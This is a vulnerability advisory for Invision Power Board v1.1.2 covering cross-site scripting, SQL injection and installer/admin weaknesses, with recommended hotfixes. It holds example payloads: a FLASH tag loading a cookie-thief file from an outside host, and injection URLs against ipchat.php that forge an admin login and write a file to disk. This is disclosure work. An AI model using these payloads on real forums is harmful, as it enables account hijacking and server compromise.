Lỗi Invision Power Board v1.1.2
trang này đã được đọc
lần
Product:
Power Board v1.1.2 (maybe earlier Versions)
Vulnerablities: cross site scripting, sql-injection, install- and admin-issues,
os-command execution
Vuln.-Classes: Check out http://www.owasp.org/asac/ for more detailed
information on "Attack Components"
Vendor: http://www.invisionboard.com/
Vendor-Status: contacted "info@invisionpower.com" on Jul.11th 2003
Vendor-Patchs: http://www.invisionboard.com/downloads/chat.zip
Exploitable:
Local: ---
Remote: YES
============
Introduction
============
Visit "http://www.invisionboard.com/" for additional information.
=============
Vulnerability Details
=============
1) CROSS-SITE-SCRIPTING
OBJECT:
Post.php
DESCRIPTION:
by using [FLASH=h,w][/FLASH]-tags within a posting(Post-textarea) it is possible
to execute arbitrary client-scripts ... thus leading to cookie-theft.
the usage of flash tags is allowed per default in "conf_global.php":
---*---
$INFO['allow_flash'] = '1';
---*---
EXAMPLE-Content:
---*---
hey dude, whats up?
[FLASH=2,2]http://anotherhost.ext/cookie-thief.swf[/FLASH]
cu,jonnie
---*---
2) SQL-INJECTION
OBJECT:
ipchat.php
DESCRIPTION:
depending on mysql-version and/or drivers it is possible to change the result
of sql-queries.
EXAMPLE(mySql > 4):
---*---
http://localhost/ibo/ipchat.php?password=1&username=9x%2527+union+select+%25271%2527,%2527c4ca4238a0b923820dcc509a6f75849b%2527,%2527admin%2527,1%252f*+
---*---
EXAMPLE(with file-permission set):
---*---
http://localhost/ibo/ipchat.php?password=1&username=admin%2527into+outfile+%2527[fullpath]%2527--+
---*---
3) INSTALLER-, ADMIN-ISSUES
if for some reason(permissions, directory-moving) the
installer-lockfile(install.lock) is missing, any user can use the
"sm_install.php" - script.
once administrator .. one is able to:
A) execute arbitrary SQL-QUERIES thru "admin.php/act=mysql/code=runsql/query=sq"
B) upload arbitrary files(including programms and scripts) into the "emoticons"
directory.
.. thus leading to a "total" compromise of the http-servers account.
============
Recommended Hotfixes
============
disallow flash in "conf_global.php".
check for installer-lockfile.
software patch(es).